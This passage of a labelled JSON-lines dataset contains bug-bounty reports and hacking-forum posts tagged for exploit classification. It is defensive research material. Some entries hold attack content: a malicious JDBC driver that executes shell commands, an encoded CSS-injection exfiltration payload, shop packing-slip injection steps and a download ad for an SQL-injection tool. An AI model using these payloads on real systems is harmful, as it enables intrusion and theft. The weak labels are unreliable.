1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n },\n {\n \"key\": \"private\",\n \"doc_count\": 1\n }\n ]\n }\n }\n }\n }\n}\n```\n\n## Impact\n\nImpact depends on what information is stored in which index, and which fields can be aggregated by. In the current situation at least allows to expose asset information, handles and other information of teams you don't have access to.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9fdc11ff5a6e8abea89f", "text": "Am I supposed to be looking in the packet details tab for a username? I have filtered through different protocols and nothing looks obvious to me.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-09-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "08dab5fec57398fe01e3", "text": "[Unknown] Go : Add more JWT sinks\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5ca1cb2bb3a767888dd3", "text": "SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains malware)\n\n846×558 125 KB Video: Download: HACKING CRACKING SECURITY SEO MARKETING MMO SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains... https://vimeo.com/746983244 Download Here VirusTotal Password Unrar is 1 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-09-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ded722b4da40d7ce3ac6", "text": "[Security Through Obscurity] Link-shortener bypass (regression on fix for #1032610)\n\nReport #1032610, entitled\n\n> Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links\n\nwas [closed as _Resolved _ about six months ago](https://hackerone.com/reports/1032610#activity-12095285).\n\nHowever, a regression on the fix for the vulnerability in question seems to have occurred, and the bug is reproducible with the exact same payload.\n\n## Impact\n\nRefer to [#1032610](https://hackerone.com/reports/1032610#user-content-impact).", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1f092c1b684e1fcba212", "text": "here is the solution if none of the advice did not work. Make sure to delete “salt” in the #Variables tab. We will set the salt in the loop. Variables var=“9M” hash=“VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K” Base64 Encoding Example: $ echo “Some Text” | base64 ← For-Loop here for ((i = 0 ; i < 28 ; i++)); do echo “Try number $i” var=$(echo $var | base64) echo $var | wc -c salt=$(echo $var | wc -c) done", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4efab9686a3db48f9260", "text": "Hey dude, It sounds like you are going hella above and beyond for this challenge. You look to be in the right place, but you shouldn’t need all the advanced payloads that you are trying to use. Feel free to DM me and I will see if I can point you in a better direction. -onthesauce", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2b99cade015d32d2b443", "text": "[Cross-site Scripting (XSS) - DOM] Cross Site Scripting Vulnerability in fabric-sdk-py source code\n\nSee this fix on GitHub \nhttps://github.com/hyperledger/fabric-sdk-py/pull/175\n\n## Impact\n\nSome old affected versions of this package are vulnerable to Cross-site Scripting (XSS). Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1fd03811663a1304085c", "text": "[Integer Overflow] Integer overflows in unescape_word()\n\n## Summary:\nA similiar issue to [CVE-2019-5435](https://hackerone.com/reports/547630)\n\n## Steps To Reproduce:\n### analysis\nDICT protocol can use one url like \"dict://localhost:3306\", and function unescape_word() is used to deal with the character in url like this comment\n```c\n /* According to RFC2229 section 2.2, these letters need to be escaped with\n \\[letter] */\n if((ch <= 32) || (ch == 127) ||\n (ch == '\\'') || (ch == '\\\"') || (ch == '\\\\')) {\n dictp[olen++] = '\\\\';\n }\n```\n\nand the bug case here /curl/lib/dict.c\n\n```c\nstatic char *unescape_word(const char *inputbuff)\n{\n char *newp = NULL;\n char *dictp;\n size_t len;\n\n CURLcode result = Curl_urldecode(inputbuff, 0, &newp, &len, <------------- get len\n REJECT_NADA);\n if(!newp || result)\n return NULL;\n\n dictp = malloc(len*2 + 1); <------------ overflow here\n//.....\n}\n```\n\nIn my analysis(maybe wrong), the `inputbuff` in DICT url is \"dict:[inputbuff]\", for example \"//localhost:3306\" in \"dict://localhost:3306\", and `len` is the length of `inputbuff`.\n\nAnd the length of `inputbuff` multiplied by 2 and then passed to malloc. This may lead to a integer overflow on a 32bit OS when the inputbuff is longer than 2GB\n\n`unescape_word` was called by dict_do(), If someone use libcurl to code, and call dict_do() with a extreme long url, it might be triggered.\n\n## Impact\n\nIt might leads to a crash or some other impact.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2019-5435"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aed84a361a209408d7db", "text": "[Unknown] If the website does not impose additional defense against CSRF attacks, failing to use the 'Lax' or 'Strict' values could increase the risk of exposur\n\n## Summary:\n[Cookies are typically sent to third parties in cross-origin requests. This can be\nabused to do CSRF attacks. Recently a new cookie attribute named SameSite was\nproposed to disable third-party usage for some cookies, to prevent CSRF attacks.\nSame-site cookies allow servers to mitigate the risk of CSRF and information leakage\nattacks by asserting that a particular cookie should only be sent with requests\ninitiated from the same registrable domain.]\n\n## Platform(s) Affected:\n[website :- This may lead to Cross-Site-Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens). \nTechnical Impact: Modify Application Data ]\n\n## Steps To Reproduce:\n[Go to website www.yelp.com/ and inspect the website and go application and cookie. and check Sensitive Cookie with Improper SameSite Attribute.\n]\n\n 1. [Cookie \"myCookie\" rejected because it has the \"SameSite=None\" attribute but is missing the \"secure\" attribute.\n\nThis Set-Cookie was blocked because it had the \"SameSite=None\" attribute but did not have the \"Secure\" attribute, which is required in order to use \"SameSite=None\".]\n 2. [The server can set a same-site cookie by adding the SameSite=...attribute to the Set-Cookie\nheader. There are three possible values for the SameSite attribute:\n• Set-Cookie: key=value; SameSite=Lax\n• Set-Cookie: key=value; SameSite=Strict\n• Set-Cookie: key=value; SameSite=None; Secure]\n \n\n## Supporting Material/References:\n[ https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite, https://owasp.org/www-community/SameSite, https://web.dev/samesite-cookies-explained/ (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nTechnical Impact: Modify Application Data\nIf the website does not impose additional defense against CSRF attacks, failing to use the 'Lax' or 'Strict' values could increase the risk of exposure to CSRF attacks. The likelihood of the integrity breach is Low because a successful attack does not only depend on an insecure SameSite attribute. In order to perform a CSRF attack there are many conditions that must be met, such as the lack of CSRF tokens, no confirmations for sensitive actions on the website, a \"simple\" \"Content-Type\" header in the HTTP request and many more.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ce62b170ed9efd588382", "text": "[Classic Buffer Overflow] Use of Unsafe function || Strcpy\n\n## Summary:\nIt was observed that application is using strcpy() function which may cause buffer overflow attacks.\n\n#Affected Code\nhttps://github.com/curl/curl\n\n# Affected Lines\n1. Line 195 of curl-master\\tests\\libtest\\stub_gssapi.c\n2. Line 204,212,216 curl-master\\tests\\server\\socksd.c\n\n## Steps To Reproduce:\nLets first discuss what is the issue with strcpy function. basically it takes 2 arguments 1 dst 2 source. the issue is if the dst size is small and the source size is more without a null terminating value so it will overwrite the memory. so in these case 1 got the several lines about strcpy function. but i'm discussing 1 with you rest with remain the same.\n\n else if(!strcmp(key, \"backend\")) {\n strcpy(config.addr, value);\n\n else if(!strcmp(key, \"password\")) {\n strcpy(config.password, value);\n\n char addr[32]; /* backend IPv4 numerical */\n char user[256];\n char password[256];\n\nhere it is copying the value into config.addr and the size of addr is 32 and same goes for password is 256. now let suppose the value of value is more than 32 in case of add and in case of password it is more than 256. than it can be buffer overflow attack here. so here it will be secure if you use the functions like snprintf , strlcpy. or dynamically assign the size to the array.\n\n## Supporting Material/References:\nhttps://cwe.mitre.org/data/definitions/676.html\nhttps://www.geeksforgeeks.org/why-strcpy-and-strncpy-are-not-safe-to-use/\n\n# Recommendation:\nIt is recommended to use below mentioned functions to avoid buffer overflow attacks\n1. snprintf\n2. strlcpy\n\n * [attachment / reference]\nPlease find the attached screenshots for your reference.\n\n## Impact\n\nThe strcpy() function does not specify the size of the destination array, so buffer overrun is often a risk. Using strcpy() function to copy a large character array into a smaller one is dangerous, but if the string will fit, then it will not be worth the risk. If the destination string is not large enough to store the source string then the behavior of strcpy() is unspecified or undefined.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0e4ab46a5d65eb43734d", "text": "[Improper Certificate Validation] Undici ProxyAgent vulnerable to MITM\n\nFull GitHub advisory summarizing the issue is here: https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33\nThe original Node.js HackerOne report is here: https://hackerone.com/bugs?report_id=1583680\n\nThis was fixed & disclosed in Undici v5.5.1.\n\nThis primarily affects Undici, a subproject under the Node.js umbrella, which is experimentally included as part of recent Node.js releases. This issue doesn't immediately affect standalone Node.js usage today due to the limited APIs initially exposed, but it does affect all usage of Node.js's new Fetch API with HTTP proxies (since Undici was required for that) and @mcollina in https://hackerone.com/bugs?report_id=1583680 who processed the Node.js security report said this should be eligible for a Node.js bounty.\n\n## Impact\n\nSee https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33 for more details but in short: it allows for trivial MitM of all HTTPS traffic sent to a proxy with Undici's ProxyAgent API. In all cases the proxy can invisibly MitM 'secure' traffic, and in most cases everybody else on the network path can do so too.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "63015a75bb81cf3f4a7d", "text": "Thank you very much! It took a day to figure out your hint but I finally got it. Much appreciated. Looking back now, I can’t believe I struggled so much on this one.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e3354371765b67d0b2d5", "text": "[Business Logic Errors] CVE-2022-32208: FTP-KRB bad message verification\n\nWhen curl does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client.\n\n## Impact\n\nLoss of integrity of FTP-KRB transfers", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-32208"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b9fa5501359496cddfab", "text": "I’m still stuck. I’m not able to make out all the hints that people gave in here. I would really appreciate if anyone could give me somemore hints or can provide me any resources so that I could understand this topic well", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-05-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7f64bad893b924d83628", "text": "[Cross-site Scripting (XSS) - Generic] One Click XSS in [www.shopify.com]\n\n## Steps To Reproduce:\n\n 1. You need a web server, put {F1722320} to www\n 2. visit it: http://:/poc.html?x=${alert(1)}\n3. click it\n4. you will see the alert\n\n## Supporting Material:\n\n{F1722333}\n\n## Impact\n\nCookie Stealing - A malicious user can steal cookies and use them to gain access to the application.\nArbitrary requests - An attacker can use XSS to send requests that appear to be from the victim to the web server.\nMalware download - XSS can prompt the user to download malware. Since the prompt looks like a legitimate request from the\nsite, the user may be more likely to trust the request and actually install the malware.\nDefacement - attacker can deface the website usig javascript code.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d147c1e7e37c0f4757f2", "text": "[Resource Injection] XSS in Desktop Client via user status and information\n\n## Summary:\nThe `Nextcloud Desktop Client` application does not properly neutralize the `Full Name` and `Status Message` of users before using them.\n\n## Steps To Reproduce:\n\n### Server Machine:\n1. Install the `Nextcloud Server` application\n2. Log into your account\n3. Navigate to your profile page\n4. Set the `Full Name` of your user to ``\n5. Set the `Status Message` of your user to ``\n\n### Client Machine:\n6. Install the `Nextcloud Desktop Client` application onto a machine that is running the `Windows 10` operating system\n7. Log into your account\n8. Open the main dialog window of the `Nextcloud Desktop Client` application\n9. Observe that the `Full Name` and `Status Message` of your user are treated as `HyperText Markup Language`\n\n## Supporting Material/References:\n{F1945608}\n\n## Impact\n\nAn attacker can inject arbitrary `HyperText Markup Language` into the `Nextcloud Desktop Client` application.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "80493eeb3f4870783847", "text": "[Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)] [h1-2102] HTML injection in packing slips can lead to physical theft\n\n## Summary:\nA HTML injection vulnerability exists in the packing slip generator, allowing customers to alter the logistical process of their and other's orders for shops that choose to display the user's e-mail address on the packing slip. The success rate depends on the shops setup and can result in financial losses for the affected stores.\n\n###Background - how stores use the packing slip\nOnce an order comes in, the packing slips and shipping labels get printed to be processed. From my understanding, when preparing orders, logistical teams don't go back and forth between the Shopify orders, but print the packing slips in bulk (hence the new ability to print in bulk), fill the boxes in the warehouse with whatever is on the packing slip, put on a shipping label on the box and send it off.\nShould the customer be able to alter these packing slips upon printing, it could be possible to alter what (and how many) items will be in their box. It is observed that this is possible using some CSS tweaks and a HTML injection in the e-mail field.\n\n## Prerequisites\n\n- You'll need a store with a product that you can order. You can either work with a bogus payment gateway, or set the price of the product to 0 and mark it as a non-physical good so there's no shipping costs involved.\n\n## Steps To Reproduce:\n- Go to admin > delivery and set a packing slip template that displays the user's e-mail address in the billing / checkout info. **You can use the one in the attachment** (packingslip.txt). The example should look like this:\n\n{F1171862}\n\n- As a customer, go to the store and check out the item. **Buy only one**, we'll alter the amount through this bug as a PoC.\n\n{F1171898}\n\n- Enter the following e-mail (yes, this is a valid e-mail address, see [RFC3696](https://tools.ietf.org/html/rfc3696)):\n\n> \"\"@gmail.com\n\n{F1171899}\n\n- Complete your order:\n\n{F1171900}\n\n- You're done! Now wait and profit!\n\n**From the shop employee's perspective, go to orders. You have a new order, yay!**\n\nFree product has been ordered one time. Great! Let's print the packing slip (in big stores this would be printed in bulk, so people wouldn't really notice anything):\n\n{F1171902}\n\nNotice that the packing slip looks like this:\n\n{F1171903}\n\nSeems like the logistics team will be shipping *1337* items in instead of 1. We only paid for 1.\nWe could also alter other stuff, like the actual item, or when printed in bulk, we could alter _other_ people's packing slip. The sky is the limit! This won't work for all shops, but when it does, the impact will be very effective.\n\n## Impact\n\n- Literally steal goods\n- Alter other people's stuff as well if they use the bulk printer (e.g. add a special note, put your return address on the slip instead of the shop's, etc...)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c89ae00bfda44e86c2ee", "text": "[Information Disclosure] Potential IP revealing using UNC Path in Windows File Picker\n\nThis report is inspired by #294364. The release note says that after fixing [Bug 26424](https://trac.torproject.org/projects/tor/ticket/26424), UNC path is disabled in Tor. But I found that I can still type UNC path in Windows file picker dialog box, and that sends requests to remote servers without Tor proxy.\n\nSome social engineering is required to exploit this trick though. Attackers can use on their website, and trick users to click \"Browse\" and type an attacker-controlled IP address into file picker in UNC format.\n\nIs it possible to disable UNC path in the Windows file picker? If not, how about showing a warning message?\n\n## Impact\n\nWith some social engineering, attackers can know user's real IP address with .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "98e3fdebbd0bf0bb0fe0", "text": "[Unknown] [Python]: Timing attack\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2579226c8adbe632f84e", "text": "I’m just starting looking into networks and security (extremely new), however, I need to know how to gain access to an iPhone on my Wi-Fi? There seems to be an iPhone that keeps logging on my network, even though I’ve changed my password, and at this time I just want to know if there is a way for me to get in their device since they are using my Wi-Fi? Idk where else to go. TIA", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-06-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "edc991d4e2da3bfaa822", "text": "[Unknown] Yet another SSRF query for Javascript\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e765633c2c8d8dc53207", "text": "Easter Bunny hide message\n\nhello friends i am trying to solve the easter bunny machine but i couldn’t solve it can you help me?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0b8f11b3c187397414b6", "text": "If anybody is having issues with part 2 of Skill Assessment-Service Login, follow the HTB Academy steps for FTP Brute Forcing very closely. The best tip I can give you is to be patient because it can take a while for the brute force to work", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8b7ebc870483d867d2ab", "text": "[Information Exposure Through Sent Data] CVE-2022-27779: cookie for trailing dot TLD\n\nPublished Advisory: https://curl.se/docs/CVE-2022-27779.html\n\nOriginal Report: https://hackerone.com/reports/1553301\n\n## Impact\n\nThis can allow arbitrary sites to set cookies that then would get sent to a different and unrelated site or domain. (ie. conduct session fixation attacks.)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-27779"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "db8c17b7eac1f8cb07ed", "text": "[Information Disclosure] Path paths and file disclosure vulnerabilities at influxdb.quality.gitlab.net\n\n> NOTE! Thanks for submitting a report! Please note that initial triage is handled by HackerOne staff. They are identified with a `HackerOne triage` badge and will escalate to the GitLab team any. Please replace *all* the (parenthesized) sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!\n\n### Summary\n\nPath paths and file disclosure vulnerabilities at influxdb.quality.gitlab.net\n\nHi, I discovered a file disclosure vulnerability within the influxdb.quality.gitlab.net domain This allows attackers to only get arbitrary files from remote servers. Where the file stack trace can be viewed without authentication. A heap file is an unordered set of records, stored on a set of pages. This class provides basic support for inserting, selecting, updating, and deleting records. Temporary heap files are used for external sorting and in other relational operators. A sequential scan of a heap file (via the Scan class) is the most basic access method.\n\n### Steps to reproduce\nVulnerability endpoint:\n```\n1. https://influxdb.quality.gitlab.net/debug/pprof\n2. https://influxdb.quality.gitlab.net/debug/pprof/goroutine?debug=1\n3. https://influxdb.quality.gitlab.net/debug/pprof/heap\n4. https://influxdb.quality.gitlab.net/debug/pprof/trace\n5. https://influxdb.quality.gitlab.net/metrics/\n6. https://influxdb.quality.gitlab.net/stats.json\n```\n\n## Impact\n\nallows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0455d5281778443b6b48", "text": "[Privilege Escalation] jdbc apache airflow provider code execution vulnerability\n\nIn airflow.providers.jdbc.hooks.jdbc.JdbcHook, A privilege escalation vulnerability exists in a system due to controllable `Driver Path` and `Driver Class` parameters which cause executing any java code. \n\nVulnerability reproduction steps: \n1. create a malicious jdbc driver, like this\n\n```\nimport java.io.*;\nimport java.sql.*;\nimport java.util.Properties;\nimport java.util.logging.Logger;\n\npublic class Test implements Driver {\n\n static {\n try {\n cmd();\n DriverManager.registerDriver(new Test());\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n @Override\n public Connection connect(String url, Properties info) throws SQLException {\n return null;\n }\n\n @Override\n public boolean acceptsURL(String url) throws SQLException {\n try {\n cmd();\n } catch (IOException e) {\n throw new RuntimeException(e);\n }\n // 验证URL是否为该驱动程序所支持的URL\n return url.startsWith(\"jdbc:mydb:\");\n }\n\n @Override\n public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {\n return new DriverPropertyInfo[0];\n }\n\n @Override\n public int getMajorVersion() {\n return 1;\n }\n\n @Override\n public int getMinorVersion() {\n return 0;\n }\n\n @Override\n public boolean jdbcCompliant() {\n return false;\n }\n\n @Override\n public Logger getParentLogger() throws SQLFeatureNotSupportedException {\n return null;\n }\n\n public static void cmd() throws IOException {\n String[] cmd = {\"sh\", \"-c\", \"whoami\"}; \n Process p = Runtime.getRuntime().exec(cmd);\n InputStream in = p.getInputStream();\n BufferedReader reader = new BufferedReader(new InputStreamReader(in));\n File outputFile = new File(\"/tmp/airflow-jdbc.txt\");\n BufferedWriter writer = new BufferedWriter(new FileWriter(outputFile));\n String line;\n while ((line = reader.readLine()) != null) {\n writer.write(line);\n writer.newLine();\n }\n writer.close();\n }\n}\n```\ngenerate a jar package.\n\n2. config jdbc connection\nGo to the Connection configuration page. \nFill in the `driver path` with the path of jar package generated in the previous step. \nFill in the `driver class` with the value of Test.\n\n3. click on the test button\nClick on the test button and it can be observed that the command is executed and a file named airflow-jdbc.txt is generated in the /tmp directory.\n\n\nThis is a screenshot of my email exchange with Airflow developers:\n\n███", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9ffed016009cc34bd24d", "text": "[Improper Restriction of Authentication Attempts] Password reset endpoint is not brute force protected\n\nOversight of https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v243-x6jc-42mp (https://hackerone.com/reports/1841665, but I can't judge the content there as it is not yet public).\n\nIn any case. The whole lostpassword flow is now annotated with bruteforce protection. Except the endpoint that actually matters. https://github.com/nextcloud/server/blob/master/core/Controller/LostController.php#L226-L229\n\nAn attacker can still happily try to brute force the token. Without getting throttled.\n\n## Impact\n\nThe lostpassword flow is without actual bruteforce protection.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "57e29c71febe8d509ad7", "text": "Did you end up getting it? Took me a while to see why it wasn’t working through the debugger. I get it now. This info really helped break looks the cobwebs in my head: Skills Assessment - 32 bit buffer overflow HTB ACADEMY Tools You can only debug a setuid or setgid program if the debugger is running as root. The kernel won't let you call ptrace on a program running with extra privileges. If it did, you would be able to make the program execute anything, which would effectively mean you could e.g. run a root shell by calling a debugger on /bin/su. So you might need to think of another way to get the shellcode triggered outside GDB", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0740fa2c11ca90fd0926", "text": "[Cross-site Scripting (XSS) - DOM] CSS Injection via Client Side Path Traversal + Open Redirect leads to personal data exfiltration on Acronis Cloud\n\n## Summary\n\nHi team, I hope everything goes well.\nI have found a CSS Injection in Acronis Cloud Management Console`https://mc-beta-cloud.acronis.com/mc` via the `color_scheme` GET parameter.\n\n## Description:\n\nThe flow work as I will comment below.\n\nIf we go to the URL` https://mc-beta-cloud.acronis.com/mc/?color_scheme=PARAMETER` we can see by looking at the javascript code that it will get the `color_scheme` GET parameter and will make a GET request concatenating the previous value to the URL of the CSS file, in this case is the following URL `https://mc-beta-cloud.acronis.com/mc/theme.PARAMETER.css` to request the CSS file and load it.\n\nYou can see it in the following image the request made to load the CSS commented bellow:\n\n{F1354281}\n\nSince the front end doesn't sanitize the values `.` and `/` its possible to perform a `path traversal `to request the CSS file from other path. \nFor example, if you go to:\n`https://mc-beta-cloud.acronis.com/mc/?color_scheme=%2F..%2F..%2FPARAMETER`\n\nYou will notice a GET request is being made to the following URL, confirming the `Relative Path Overwrite` issue:\n`https://mc-beta-cloud.acronis.com/PARAMETER.css?v=24.0.10942`\n\nYou can see it in the following image too:\n\n{F1354280}\n\n\nThis little issue by itself doesn't appear to be any security issue but if we combine it with a `open redirect` it could be possible to make a request to the vulnerable endpoint to the open redirect and redirect to the domain where the evil CSS file is stored, this attack is possible because when we load any CSS file by default it follows all the redirects specified in the HTTP header `Location`.\n\nWhile looking at the HTTP requests to see if I could find any open redirect and demonstrate the impact I notice one interesting API endpoint \n`https://mc-beta-cloud.acronis.com/api/2/idp/authorize/?client_id=fb2bf44e-ac14-444a-b2a9-e5e81fe73b80&redirect_uri=%2Fhci%2Fcallback&response_type=code&scope=openid&state=http://localhost&nonce=bhgjuvrrvpwauibleqhvfqat`.\nNotice the `state` GET parameter is controllable by the user so we can specify any external domain where to redirect the user.\n\nLet's see the response to the previous request:\n{F1354247}\n\nAnd if we follow the `Location` HTTP header to the endpoint `https://mc-beta-cloud.acronis.com/hci/callback?code=FSNuJgJAWX2HOVFg%3D%3D&state=http://localhost` we can confirm the `Open Redirect` issue:\n\n{F1354248}\n\nI have been digging into it and by creating other account I confirmed that if any user make a request to the first endpoint with the same GET parameters as `client_id`, `redirect_uri`, `response_type`, `scope`, `state` and `nonce` it will be redirected to `http://localhost` so once we know that there is no need to guess any user parameter as `client_id` makes the attack more easy because the user only needs to visit a link with a crafted `color_scheme` parameter and the same parameters for the open redirect seen bellow.\n\n\nOnce we confirmed the `Relative Path Overwrite` and `Open Redirect` let's put it all together to make the exploit.\nWe know that when we load any CSS file it follows all the redirects specified in the HTTP header `Location` so if we are able to overwrite the relative path to the vulnerable Open Redirect endpoint, redirecting the user to the CSS file of my domain we can exfiltrate user personal information by using CSS properties.\n\nBy putting together these two tricks if the `color_sheme` have the value:\n\n`%2F..%2F..%2F..%2Fapi%2F2%2Fidp%2Fauthorize%2F%3Fclient_id%3Dfb2bf44e-ac14-444a-b2a9-e5e81fe73b80%26redirect_uri%3D%252Fhci%252Fcallback%26response_type%3Dcode%26scope%3Dopenid%26state%3Dhttp%253A%252F%252Flocalhost%252Fcss%252Fcore.css%26nonce%3Dbhgjuvrrvpwauibleqhvfqat`\n\nYou will notice that the first thing we do in the previous payload is `Overwrite the Relative Path` to the root directory. Then we specify the endpoint vulnerable to the `Open redirect` and in this vulnerable endpoint redirect the ", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1a229b3e6f49c89deceb", "text": "Hello every I am learning C#. because I want to bypass Anti-Viruses by C#.But I don’t know how to learn this knowledge about bypass Anti-Viruses by C#.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-08-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c3c67345236ee6652be4", "text": "Hey, do we brute force for ssh or ftp for g.potter login?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-22", "split": "val", "label_source": 